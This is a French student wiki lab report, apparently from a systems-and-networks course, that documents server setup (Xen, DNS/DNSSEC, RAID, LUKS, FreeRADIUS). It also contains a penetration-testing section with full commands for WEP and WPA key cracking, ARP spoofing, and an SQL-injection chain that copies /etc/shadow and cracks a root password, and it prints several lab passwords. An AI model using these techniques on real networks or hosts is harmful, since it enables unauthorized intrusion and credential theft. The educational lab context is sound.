https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&feedformat=atom&user=BjacquotWiki d'activités IMA - Contributions de l’utilisateur [fr]2026-04-25T03:04:28ZContributions de l’utilisateurMediaWiki 1.29.2https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G6&diff=57839TP sysres IMA5 2021/2022 G62022-01-11T14:39:17Z<p>Bjacquot : /* Serveur SSH */</p>
<hr />
<div>__TOC__<br />
<br style="clear: both;"/><br />
<br />
=Création de la machine virtuelle=<br />
<br />
On veut créer notre machine virtuelle sur l'hyperviseur (HV) capbreton. Afin de pouvoir télécharger l'image Debian, on utilise tout d'abord la commande suivante :<br />
<br />
$ export http_proxy=http://proxy.plil.fr:3128<br />
<br />
Pour lancer la création de la machine virtuelle, on doit donner le nom de la machine qui sera Bellerose (d'après le thème des noms de bière). Ensuite nous avons l'adresse IP qui nous a été attribuée lors de la répartition des groupes (donc pour nous ce sera 193.48.57.181). On donne aussi l'adresse IP du routeur flottant (193.48.57.190) et le masque du réseau (255.255.255.240 car c'est un /28). On indique également l'emplacement des disques virtuels : /usr/local/xen, le mot de passe pour se connecter à la machine virtuelle : pasglop, et la distribution que nous allons utiliser qui est Debian bullseye.<br />
<br />
$ xen-create-image --hostname=Bellerose --ip=193.48.57.181 --gateway=193.48.57.190 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
On crée ensuite 2 LV de 10 Go (nommés Bellerose1 et Bellerose2) sur le groupe de volume storage.<br />
<br />
$ lvcreate -L10G -n Bellerose1 storage<br />
$ lvcreate -L10G -n Bellerose2 storage<br />
<br />
Puis il faut les formater au format ext4, alors on utilise les commandes suivantes :<br />
<br />
$ mkfs.ext4 /dev/storage/Bellerose1<br />
$ mkfs.ext4 /dev/storage/Bellerose2<br />
<br />
On modifie notre fichier /etc/xen/Bellerose.cfg pour indiquer à la machine virtuelle qu'elle possède les volumes logiques Bellerose1 et Bellerose2 (on ajoute alors 2 lignes dans la fonction disk) et on ajoute le bridge IMA5sc dans la fonction vif.<br />
<br />
$ vim /etc/xen/Bellerose.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Bellerose1,xvda3,w',<br />
'phy:/dev/storage/Bellerose2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.181 ,mac=00:16:3E:FA:D0:95 ,bridge=IMA5sc' ]<br />
<br />
On peut maintenant lancer notre machine virtuelle :<br />
<br />
$ xl create -c /etc/xen/Bellerose.cfg<br />
<br />
Avec la commande :<br />
<br />
$ cat /etc/fstab<br />
<br />
On voit xvda1 et xvda2. On va créer xvda3 et xvda4 pour pouvoir y mettre les répertoires var et home de notre machine virtuelle :<br />
<br />
$ mkdir /mnt/xvda3<br />
$ mkdir /mnt/xvda4<br />
$ mount /dev/xvda3 /mnt/xvda3<br />
$ mount /dev/xvda4 /mnt/xvda4<br />
<br />
Puis on déplace le répertoire var dans le disque xvda4 :<br />
<br />
$ mv /var/* /mnt/xvda4<br />
<br />
Pour monter les disques, on ajoute ces lignes dans le fichier /etc/fstab :<br />
<br />
# /home vers xvda3<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
# /var vers xvda4<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On monte le tout à l'aide de la commande :<br />
<br />
mount -a<br />
<br />
Enfin avec lsblk, on peut voir les deux partitions de notre VM :<br />
<br />
$ lsblk<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
Enfin, nous activons l'IPv6 sur l'interface en modifiant <code>/etc/network/interfaces</code><br />
<br />
iface eth0 inet6 auto<br />
<br />
Pour quitter la VM : CTRL+]<br />
<br />
= Services Internet =<br />
<br />
== Serveur SSH ==<br />
<br />
$ apt install openssh-server<br />
<br />
on édite le fichierde conf <code>/etc/ssh/sshd_config</code> (via ssh key) :<br />
<br />
PermitRootLogin without-password // je l'ai repassé en "yes" suite au mail et le mdp root est celui de pifou habituel <br />
PubkeyAuthentication yes<br />
<br />
après on reload la conf<br />
<br />
$ systemctl reload ssh<br />
<br />
On génère une clé ssh depuis notre zabeth avec <code>ssh-keygen -t ed25519</code> et on l'ajoute dans <code>/.ssh/authorized_keys</code> et c'est gooooood<br />
<br />
== Serveur DNS ==<br />
<br />
on achète le ndd<br />
<br />
on crée un "Glue Record" pour notre nameserver <code>ns1.belle-rose.site</code><br />
<br />
on install bind<br />
<br />
$ apt install bind9<br />
<br />
on configure <code>/etc/resolv.conf</code><br />
<br />
nameserver 127.0.0.1<br />
<br />
on configure bind <code>/etc/bind/named.conf.local</code><br />
<br />
zone "belle-rose.site" IN {<br />
type master;<br />
file "/etc/bind/db.belle-rose.site";<br />
allow-transfer { 217.70.177.40; };<br />
};<br />
<br />
On ajoute nos ns <code>/etc/bind/db.belle-rose.site</code><br />
<br />
;<br />
; BIND dans ta face<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.belle-rose.site. postmaster.belle-rose.site. (<br />
2 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.belle-rose.site.<br />
@ IN NS ns6.gandi.net.<br />
ns1 IN A 193.48.57.181<br />
<br />
Ensuite on peut tester notre conf avec<br />
<br />
$ host -t any ns1.belle-rose.site localhost<br />
Using domain server:<br />
Name: localhost<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
ns1.belle-rose.site has address 193.48.57.181<br />
<br />
Et on incrémente aussi le Serial dans <code>/etc/bind/db.belle-rose.site</code> à 3.<br />
<br />
== Certificat ==<br />
<br />
Notre certificat Gandi nous a été retiré de force par quelqu'un de mal intentionné. De ce fait, nous avons utilisé un certificat <code>Let's Encrypt</code>. Après avoir installé <code>certbot</code>, on utilise simplement la commande :<br />
<br />
certbot --apache<br />
<br />
https://www.belle-rose.site/ IZOK<br />
<br />
== DNSSEC ==<br />
<br />
On suit les étapes suivantes :<br />
<br />
1. On ajoute l’option <code>dnssec-enable yes;</code> dans le fichier <code>named.conf.options</code><br />
<br />
2. On crée un répertoire <code>belle-rose.site.dnssec</code> pour y générer les clefs<br />
<br />
3. On crée la clef asymétrique de signature de clefs de zone :<br />
<br />
$ dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE belle-rose.site<br />
<br />
4. On crée la clef asymétrique de la zone pour signer les enregistrements<br />
<br />
$ dnssec-keygen -a RSASHA1 -b 1024 -n ZONE belle-rose.site <br />
<br />
5. On renomme les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);<br />
<br />
$ mv Kbelle-rose.site.+005+37138.key belle-rose.site-ksk.key<br />
$ mv Kbelle-rose.site.+005+35638.key belle-rose.site-zsk.key<br />
$ mv Kbelle-rose.site.+005+37138.private belle-rose.site-ksk.private<br />
$ mv Kbelle-rose.site.+005+35638.private belle-rose.site-zsk.private<br />
<br />
6. On inclue les clefs publiques dans votre fichier de zone <code>/etc/bind/db.belle-rose.site</code>, et on incrémente le numéro de version de la zone ;<br />
<br />
$include /etc/bind/belle-rose.site.dnssec/belle-rose.site-ksk.key<br />
$include /etc/bind/belle-rose.site.dnssec/belle-rose.site-zsk.key<br />
<br />
7. On signe les enregistrements de la zone ;<br />
<br />
$ dnssec-signzone -o belle-rose.site -k belle-rose.site-ksk ../db.belle-rose.site belle-rose.site-zsk<br />
<br />
8. On modifie le fichier <code>named.conf.local</code> pour utiliser la zone signée de suffixe .signed :<br />
<br />
$ vim ../named.conf.local<br />
zone "belle-rose.site" IN {<br />
type master;<br />
file "/etc/bind/db.belle-rose.site.signed";<br />
allow-transfer { 217.70.177.40; };<br />
};<br />
<br />
9. il ne reste plus qu’à communiquer la partie publique de la KSK (présente dans le fichier www.belle-rose.site-ksk.key) à notre registrar (sur gandi.net, dans la section "Manage DNSSEC" puis "DNS servers")<br />
<br />
root@Bellerose:/etc/bind/belle-rose.site.dnssec# cat belle-rose.site-ksk.key <br />
; This is a key-signing key, keyid 22094, for belle-rose.site.<br />
; Created: 20220111091701 (Tue Jan 11 09:17:01 2022)<br />
; Publish: 20220111091701 (Tue Jan 11 09:17:01 2022)<br />
; Activate: 20220111091701 (Tue Jan 11 09:17:01 2022)<br />
belle-rose.site. IN DNSKEY 257 3 5 AwEAAbbNBQJskwFezV1LwDsxAkCVbOcy4X3/mgffMjd/3FIHZpkdVrk3 w88041cgWbVSmom0ma8fFNqntidWlO//rMPvKT0ex3dqCse7on3/odox vxR3Zh5hPdv4K7X35BLuZta4x/RCBLgiFVyXo12qqBl0Htxn2hRyycKv 2caEYwnyRI75KSrr5f5XtQS8LyZCbtmMAp5YJu1wiDxwLcUwwJKvYS+q dtq4sm3KwW+qbjcUswkMMjXNAsvzwZ5FyHcondvvPuErc+Fhdvpxyoq+ W44ynLRnz7cb3R44z/TXFCwNlQI3MWzFvhbDK1YeJLpqjgYrET4eqqka mbFMYuLPQzE=<br />
<br />
(on copie que la partie chiffrée, pas le record DNSKEY)<br />
<br />
10. Enfin, nous pouvons tester la configuration:<br />
<br />
root@Bellerose:~# host -t any belle-rose.site<br />
belle-rose.site has RRSIG record DS 8 2 3600 20220210205226 20220111074233 56238 site. t5ANbAiG69DP5E9ccCIMtEEMs1urP6mSQpb210bDUbCD7vdXqONhLJ9M dcjyHQjhdTWKd9qc48tnY8fwL4PUeOYLexcaUEQgLMkbEBUDMzpcvMsb n4sM2BXgk7lJ9vyE1zsgfBNg7X8IV5c7sRrEuZyg7VbjPYmqx5BJ3cC8 Dy0=<br />
belle-rose.site has DS record 22094 5 2 86D5EAC51853FAA1865BB63C0F353EEB50D5A59093409E66A3F7044C AC3AF70F<br />
belle-rose.site name server ns6.gandi.net.<br />
belle-rose.site name server ns1.belle-rose.site.<br />
belle-rose.site has RRSIG record DNSKEY 5 2 604800 20220210082130 20220111082130 6672 belle-rose.site. bh2pFBuNXANoGib6RK5MAab6xy7jbUEYVOr6Pk/pa8weJPD/ACk0Z1pm urvc++ReoccxNxNy+BCd2Ri1GLhZ+kGXrF8xuNUYdyo+zpd+zZUgrx1C hKRSUqeBVpAn0uyDlRtG8cPPw01iYpDBCqmnif7+GblIH6eSJhOf+98d l8o=<br />
belle-rose.site has RRSIG record DNSKEY 5 2 604800 20220210082130 20220111082130 22094 belle-rose.site. JLB0MJqr8rfBq2MiVrZaRyDo/7/7V1GUGwCi108w8CgeUrIdImgXERY4 2nXQ21aym3Po0i+zs5DmEonEkTGMi63kjUG8ZeFjMCFm7KtNhRK8FkQk Be2yzv3odAhh/gmMyRsMa7yoLwaDWZVd4NkCJ6EaqNXP7yspcHD6pmHt 4RKJgCUo6zpLAJnFiU1cwIR+lS/HeFEW2OzOtvi/LH8bL1zewioEpTgi qHLplK68KR/1cX/4Dq2C3CaeChteMx//EkW9Vmwjg9BhRjE/VCa8P80w qJEiXeg8KXYLkCEiBK5ifgKy5EMxDG5q18ieRXaUc0F6FpG0A4POpTVx pscHmA==<br />
belle-rose.site has DNSKEY record 257 3 5 AwEAAbbNBQJskwFezV1LwDsxAkCVbOcy4X3/mgffMjd/3FIHZpkdVrk3 w88041cgWbVSmom0ma8fFNqntidWlO//rMPvKT0ex3dqCse7on3/odox vxR3Zh5hPdv4K7X35BLuZta4x/RCBLgiFVyXo12qqBl0Htxn2hRyycKv 2caEYwnyRI75KSrr5f5XtQS8LyZCbtmMAp5YJu1wiDxwLcUwwJKvYS+q dtq4sm3KwW+qbjcUswkMMjXNAsvzwZ5FyHcondvvPuErc+Fhdvpxyoq+ W44ynLRnz7cb3R44z/TXFCwNlQI3MWzFvhbDK1YeJLpqjgYrET4eqqka mbFMYuLPQzE=<br />
belle-rose.site has DNSKEY record 256 3 5 AwEAAdZrHCSjl8nMZ0pwfODUtCs4nD6iStiZzuBAfWTsm75qpG6JJzpr e3Oqqyr/Dm1bwXbLQUd0GNgGAidiAQtkbZIb/5ZQxuVxft2kp0GKUr34 44Bw1Gh8af1Npk9cqK368U6oD+EIrV2AnA2KC/KXm+DziNOkmifaFVvO rh6p91Ut<br />
belle-rose.site has RRSIG record NSEC 5 2 604800 20220210082130 20220111082130 6672 belle-rose.site. RXnysXybktajyP82ERJn1m9z/5dkOQABIzfUPf2/08jFQq96AMmEggH2 sAy/3wv6SKiwAvBN3dFkYtIefMAK0MdLykIwwLrGQwK1BSv5KKLCowtO Bdks2pjgBPFE4J/MnBnBXSm0HunudjziNgz+PN3bY/IieyPzIBfpHM0y UfM=<br />
belle-rose.site has NSEC record ns1.belle-rose.site. NS SOA RRSIG NSEC DNSKEY<br />
belle-rose.site has RRSIG record NS 5 2 604800 20220210082130 20220111082130 6672 belle-rose.site. GZRzkPkOu/RKjCE2+NWhHfTcicDCoaBq/QjimrrVPsMcse0pPebFZkTr lRHMLHZEglzopIigLwj3DQ7yjuB6EiAhudUWwZri82LjkVs+z5ItMPo6 kudNvs5oUqVGX7E6toy5rU11yBgPDNijuCI1aahUJpwAEOl9sGi9uJ9I NaI=<br />
belle-rose.site has RRSIG record SOA 5 2 604800 20220210082130 20220111082130 6672 belle-rose.site. rDQsyAPj2RG4epQ7AFGrpU4JzyAi1kif3X4N8L+53IrlNWMcByyCVtAA 1XRQ8+Ag7f8/Z7nMhLbRuPtEH6efhZJfhEOuuU0SK7Nernm6WgkCS4UI e4VVtXtbHLeM+CncfUywqpKRhyZB9qEpzloNdI6zyOlzS9bH9qMwZFSS TWY=<br />
belle-rose.site has SOA record ns1.belle-rose.site. postmaster.belle-rose.site. 6 604800 86400 2419200 604800<br />
<br />
= Tests d'intrusion =<br />
<br />
== Exploitation de failles du système ==<br />
<br />
Après plusieurs recherches, nous avons trouvé un petit soft permettant d'audit notre système et y afficher les possibles failles. > https://github.com/mzet-/linux-exploit-suggester<br />
<br />
En suivant la documentation :<br />
<br />
$ wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh<br />
$ chmod +x les.sh && ./les.sh<br />
<br />
On obtient les failles suivantes (audit réalisé sur notre VM) :<br />
<br />
[+] [CVE-2021-27365] linux-iscsi<br />
...<br />
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write<br />
...<br />
[+] [CVE-2019-13272] PTRACE_TRACEME<br />
...<br />
<br />
== Cassage de clef WEP d’un point d’accès WiFi ==<br />
<br />
On commence par rechercher le nom de notre interface. On utilise alors la commande (en root) :<br />
<br />
$ airmon-ng<br />
<br />
On trouve l'interface suivante :<br />
<br />
wlx40a5ef0127d0<br />
<br />
On essaie de démarrer l'interface sur le channel 3 :<br />
<br />
$ airmon-ng start wlx40a5ef0127d0 3<br />
<br />
Or on remarque que la réponse de la commande nous indique que l'interface a été renommé automatiquement "wlan0mon". On ré-utilise la commande précédente avec le nouveau nom d'interface :<br />
<br />
$ airmon-ng start wlan0mon 3<br />
<br />
On écoute ensuite tous les paquets dans l'air :<br />
<br />
$ airodump-ng wlan0mon<br />
<br />
A partir de là, on peut choisir un point d'accès à cracker en utilisant son BSSID (obtenu par la commande précédente). On choisit cracotte06.<br />
<br />
$ aireplay-ng -9 -e cracotte06 -a 04:DA:D2:9C:50:55 wlan0mon<br />
<br />
On peut récupérer les VI générés par le point d'accès en les stockant dans les fichiers output. On donne le channel 4 puisque le point d'accès est sur ce channel :<br />
<br />
$ airodump-ng -c 4 --bssid 04:DA:d2:9C:50:55 -w output wlan0mon<br />
<br />
On effectue de fausses authentifications avec la commande aireplay-ng dans un nouveau terminal :<br />
<br />
$ aireplay-ng -1 0 -e cracotte06 -a 04:DA:D2:9C:50:55 -h 40:A5:EF:01:0E:5F wlan0mon<br />
<br />
L'adresse MAC source donnée après le -h est obtenue lorsque l'on récupère les VI.<br />
<br />
Il faut maintenant laisser tourner la commande de récupération des VI assez longtemps pour obtenir assez de données (pour nous içi il a fallu attendre 40000 datas). On peut ensuite décrypter la clef WEP :<br />
<br />
$ aircrack-ng -b 04:DA:D2:9C:50:55 output*.cap<br />
<br />
On obtient alors :<br />
<br />
KEY FOUND ! [ 55:55:55:55:5A:BC:07:CB:A4:44:44:44:44 ]<br />
Decrypted correctly: 100%<br />
<br />
== Cassage de mot de passe WPA-PSK par force brute ==<br />
<br />
$ airmon-ng<br />
$ airmon-ng start wlan0mon 9<br />
$ airodump-ng wlan0mon<br />
<br />
On choisit le point d'accès kracotte06 à cracker. On récupère son BSSID avec la commande précédente et on utilise :<br />
<br />
$ airodump-ng -c 4 --bssid 44:AD:D9:5F:87:05 -w psk wlan0mon<br />
<br />
On crée le dictionnaire contenant toutes les clefs à tester avec la commande <code>crunch</code><br />
<br />
$ crunch 8 8 0123456789 -o dictionnaire.lst<br />
<br />
Pour savoir si un Handshake a été trouvé, on utilise la commande :<br />
<br />
$ aircrack-ng psk*.cap<br />
<br />
On trouve : <br />
<br />
# BSSID ESSID Encryption<br />
1 44:AD:D9:5F:87:05 kracotte06 WPA (1 handshake)<br />
<br />
On peut alors lancer la commande de test des clefs :<br />
<br />
$ aircrack-ng -w dictionnaire.lst -b 44:AD:D9:5F:87:05 psk*.cap<br />
<br />
Après un peu d'attente, on obtient la clef suivante :<br />
<br />
KEY FOUND! [ 59906999 ]<br />
<br />
== Attaque de type "homme au milieu" par usurpation ARP ==<br />
<br />
On branche un PC bleu sur une zabeth en ethernet et on lui configure une IP. Ensuite on peut installer dsniff et wireshark.<br />
<br />
On fait :<br />
<br />
$ echo 1 > /proc/sys/net/ipv4/ip_forward<br />
<br />
Puis on se fait passer pour le routeur (172.26.145.254) auprès de la zabeth (172.26.145.61):<br />
<br />
$ arpspoof -t 172.26.145.61 172.26.145.254<br />
<br />
En lançant wireshark, on peut voir les informations envoyées par la zabeth passer en clair.<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
Sur honey.plil.info : <br />
<br />
1. injection SQL<br />
<br />
2. connexion en tant qu'admin<br />
<br />
3. telechargement du fichier "config-db.php" (On remarque que il existe une BDD phpmyadmin) et "database.php" (ce fichier semble lui ne pas nous apporter d'informations)<br />
<br />
4. honey.plil.info/phpmyadmin -> connexion avec les logins trouvés dans le fichier "config-db.php" (phpmyadmin et gencovid19). On trouve alors une table "pma_users" indiquant le nom de plusieurs utilisateurs (totor62, manuals, phpmyadmin et root).<br />
<br />
5. en essayant le mdp "gencovid19" avec ces identifiants sur phpmyadmin : on peut se connecter en tant que "root" sur la BDD et on trouve le mdp de rex dans la bdd "test" et table "users".<br />
<br />
6. connexion en ssh sur rex@honey.plil.info.<br />
<br />
7. comme indication : "le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets". Alors on va créer un fichier de mots de 4 lettre pour ensuite doubler ces mots (exemple : bobo => bobobobo) pour essayer de cracker le mot de passe par la force brute. On créée alors le dictionnaire avec l'utilitaire crunch comme pour obtenir les clefs WEP :<br />
<br />
$ crunch 4 4 abcdefghijklmnopqrstuvwxyz > dico.txt<br />
<br />
Et on double la taille des mots :<br />
<br />
$ sed -i 's/\(.*\)/\1\1/' dico.txt<br />
<br />
On copie ensuite les fichiers "/etc/passwd" et "/etc/shadow" de rex@honey.plil.info sur notre zabeth. <br />
<br />
$ scp rex@honey.plil.info:/etc/passwd .<br />
$ scp rex@honey.plil.info:/etc/shadow .<br />
<br />
On utilise alors l'utilitaire "shadow" pour obtenir un fichier contenant le mot de passe haché de root :<br />
<br />
$ unshadow passwd shadow | head -1 > honey<br />
<br />
Puis on utilise "John the Ripper" pour cracker le mot de passe :<br />
<br />
$ john -w:dico.txt honey<br />
<br />
Après quelques minutes, on peut afficher le mot de passe trouvé :<br />
<br />
$ john --show honey<br />
root:fortfort:0:0:root:/root:/bin/bash<br />
1 password hash cracked, 0 left<br />
<br />
On trouve le mot de passe de root@honey.plil.info qui est "fortfort".<br />
<br />
= Point d'accès Wi-Fi authentifié via FreeRADIUS =<br />
<br />
== Configuration du point d'accès ==<br />
<br />
=== Point d'accès ===<br />
<br />
Tout d'abord il faut configurer l'authentification EAP dans la configuration :<br />
<br />
conf t<br />
<br />
aaa new-model<br />
aaa authentication login eap_rose group radius_rose<br />
radius-server host 193.48.57.181 auth-port 1812 acct-port 1813 key zinzin<br />
aaa group server radius radius_rose<br />
server 193.48.57.181 auth-port 1812 acct-port 1813<br />
exit<br />
<br />
Configurons le SSID :<br />
<br />
conf t<br />
<br />
dot11 ssid SSID_ROSE<br />
vlan 5<br />
authentication open eap eap_rose<br />
authentication network-eap eap_rose<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
exit<br />
exit<br />
<br />
On associe notre SSID à l'interface WIFI :<br />
<br />
conf t<br />
<br />
interface Dot11Radio0<br />
encryption vlan 5 mode ciphers aes-ccm tkip<br />
ssid SSID_ROSE<br />
mbssid<br />
exit<br />
exit<br />
<br />
On paramètre notre VLAN (5)<br />
<br />
conf t<br />
<br />
interface Dot11Radio0.5<br />
encapsulation dot1Q 5<br />
no ip route-cache<br />
bridge-group 5<br />
bridge-group 5 subscriber-loop-control<br />
bridge-group 5 spanning-disabled<br />
bridge-group 5 block-unknown-source<br />
exit<br />
exit<br />
<br />
On configure l'interface filaire<br />
<br />
conf t<br />
<br />
interface GigabitEthernet0.5<br />
encapsulation dot1Q 5<br />
bridge-group 5<br />
exit<br />
exit<br />
<br />
Enfin, on configure l'IP de l'AP et sa gateway<br />
<br />
conf t<br />
<br />
ip default-gateway 10.1.0.1<br />
interface BVI 1<br />
ip address 10.1.0.3 255.255.255.0<br />
exit<br />
exit<br />
<br />
=== Routeur ===<br />
<br />
Commençons par configurer le VLAN 1 <br />
<br />
conf t<br />
<br />
interface vlan 1<br />
ip address 10.1.0.1 255.255.255.0<br />
exit<br />
exit<br />
<br />
Puis on configure le port (ici Gi1/0/3<br />
<br />
conf t<br />
<br />
interface Gi1/0/3<br />
switchport<br />
switchport mode trunk<br />
switchport trunk allowed vlan add 1<br />
exit<br />
exit<br />
<br />
Et voilà mon grand<br />
<br />
== Serveur FreeRADIUS ==<br />
<br />
Installation de freeRADIUS<br />
<br />
apt install freeradius<br />
<br />
On commence par configurer <code>/etc/freeradius/3.0/clients.conf</code> à détailler<br />
<br />
client zozo {<br />
ipaddr = 10.1.0.3/24<br />
secret = zinzin<br />
}<br />
<br />
ensuite <code>/etc/freeradius/3.0/eap.conf</code><br />
<br />
eap {<br />
[...]<br />
default_eap_type = peap<br />
}<br />
<br />
puis <code>/etc/freeradius/3.0/users</code><br />
<br />
[...]<br />
root Cleartext-Password := "glopglop"<br />
<br />
Pour vérifier que tout fonctionne bien, on peut lancer freeradius en mode debug <code>freeradius -X</code> (après avoir au préalable stoppé le processus)<br />
<br />
= Réalisations =<br />
<br />
== Sécurisation des données (RAID 5) ==<br />
<br />
Nous avons besoin de 3 LV à rajouter à notre VM :<br />
<br />
$ lvcreate -L1G -n Bellerose-raid1 storage<br />
$ lvcreate -L1G -n Bellerose-raid2 storage<br />
$ lvcreate -L1G -n Bellerose-raid3 storage<br />
<br />
Nous pouvons ainsi les rajouter à la configuration de notre VM (<code>/etc/xen/Bellerose.cfg</code>):<br />
<br />
'phy:/dev/storage/Bellerose-raid1,xvda5,w'<br />
'phy:/dev/storage/Bellerose-raid2,xvda6,w'<br />
'phy:/dev/storage/Bellerose-raid3,xvda7,w'<br />
<br />
Nous pouvons ensuite créer le RAID en relançant la VM et en se connectant dessus.<br />
<br />
$ apt install mdadm<br />
<br />
On va ensuite créer un disque nommé <code>/dev/md0</code> grâce à <code>mdadm</code> :<br />
<br />
$ mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7<br />
<br />
On peut ainsi vérifier que notre RAID 5 est effectif :<br />
<br />
$ lsblk<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
xvda5 202:5 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda6 202:6 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda7 202:7 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
<br />
Enfin il faut monter ce disque fraîchement créé :<br />
<br />
$ mkfs.ext4 /dev/md0<br />
$ mkdir /media/raid<br />
<br />
on ajoute cette ligne dans <code>/etc/fstab</code> :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
puis<br />
<br />
$ mount -a<br />
<br />
et toc<br />
<br />
== Chiffrement des données ==<br />
<br />
On branche la clé USB sur le petit PC bleu, et on lance <code>lsblk</code> et on trouve :<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
sda 8:0 1 7,2G 0 disk <br />
<br />
Donc on peut formater la clef qui contient déjà quelque chose dessus :<br />
<br />
$ mkfs.ext4 /dev/sda<br />
<br />
Avec <code>cryptsetup</code> on peut initialiser la clef et lui donner un mdp :<br />
<br />
$ cryptsetup luksFormat /dev/sda<br />
<br />
On crée une partition chiffrée sur la clé :<br />
<br />
$ cryptsetup luksOpen /dev/sda data<br />
<br />
Et on formate :<br />
<br />
$ mkfs.ext4 /dev/mapper/data<br />
<br />
On monte cette partition pour lui permettre de contenir des fichiers :<br />
<br />
$ mkdir /mnt/data-usb<br />
$ mount -t ext4 /dev/mapper/data /mnt/data-usb<br />
<br />
On y ajoute donc un fichier de test :<br />
<br />
$ touch /mnt/data-usb/boujour.txt<br />
<br />
Puis on démonte et on ferme le volume chiffré<br />
<br />
$ umont /mnt/data-usb<br />
$ cryptsetup luksClose data<br />
<br />
Ensuite en branchant la clé USB sur un autre PC pour voir le fonctionnement de notre chiffrement, et lorsqu'on essaie d'accèder à la clef, celle ci nous demande un mot de passe pour accèder aux fichiers, donc le chiffrement fonctionne correctement.</div>Bjacquothttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G6&diff=57838TP sysres IMA5 2021/2022 G62022-01-11T14:39:07Z<p>Bjacquot : /* Serveur SSH */</p>
<hr />
<div>__TOC__<br />
<br style="clear: both;"/><br />
<br />
=Création de la machine virtuelle=<br />
<br />
On veut créer notre machine virtuelle sur l'hyperviseur (HV) capbreton. Afin de pouvoir télécharger l'image Debian, on utilise tout d'abord la commande suivante :<br />
<br />
$ export http_proxy=http://proxy.plil.fr:3128<br />
<br />
Pour lancer la création de la machine virtuelle, on doit donner le nom de la machine qui sera Bellerose (d'après le thème des noms de bière). Ensuite nous avons l'adresse IP qui nous a été attribuée lors de la répartition des groupes (donc pour nous ce sera 193.48.57.181). On donne aussi l'adresse IP du routeur flottant (193.48.57.190) et le masque du réseau (255.255.255.240 car c'est un /28). On indique également l'emplacement des disques virtuels : /usr/local/xen, le mot de passe pour se connecter à la machine virtuelle : pasglop, et la distribution que nous allons utiliser qui est Debian bullseye.<br />
<br />
$ xen-create-image --hostname=Bellerose --ip=193.48.57.181 --gateway=193.48.57.190 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
On crée ensuite 2 LV de 10 Go (nommés Bellerose1 et Bellerose2) sur le groupe de volume storage.<br />
<br />
$ lvcreate -L10G -n Bellerose1 storage<br />
$ lvcreate -L10G -n Bellerose2 storage<br />
<br />
Puis il faut les formater au format ext4, alors on utilise les commandes suivantes :<br />
<br />
$ mkfs.ext4 /dev/storage/Bellerose1<br />
$ mkfs.ext4 /dev/storage/Bellerose2<br />
<br />
On modifie notre fichier /etc/xen/Bellerose.cfg pour indiquer à la machine virtuelle qu'elle possède les volumes logiques Bellerose1 et Bellerose2 (on ajoute alors 2 lignes dans la fonction disk) et on ajoute le bridge IMA5sc dans la fonction vif.<br />
<br />
$ vim /etc/xen/Bellerose.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Bellerose1,xvda3,w',<br />
'phy:/dev/storage/Bellerose2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.181 ,mac=00:16:3E:FA:D0:95 ,bridge=IMA5sc' ]<br />
<br />
On peut maintenant lancer notre machine virtuelle :<br />
<br />
$ xl create -c /etc/xen/Bellerose.cfg<br />
<br />
Avec la commande :<br />
<br />
$ cat /etc/fstab<br />
<br />
On voit xvda1 et xvda2. On va créer xvda3 et xvda4 pour pouvoir y mettre les répertoires var et home de notre machine virtuelle :<br />
<br />
$ mkdir /mnt/xvda3<br />
$ mkdir /mnt/xvda4<br />
$ mount /dev/xvda3 /mnt/xvda3<br />
$ mount /dev/xvda4 /mnt/xvda4<br />
<br />
Puis on déplace le répertoire var dans le disque xvda4 :<br />
<br />
$ mv /var/* /mnt/xvda4<br />
<br />
Pour monter les disques, on ajoute ces lignes dans le fichier /etc/fstab :<br />
<br />
# /home vers xvda3<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
# /var vers xvda4<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On monte le tout à l'aide de la commande :<br />
<br />
mount -a<br />
<br />
Enfin avec lsblk, on peut voir les deux partitions de notre VM :<br />
<br />
$ lsblk<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
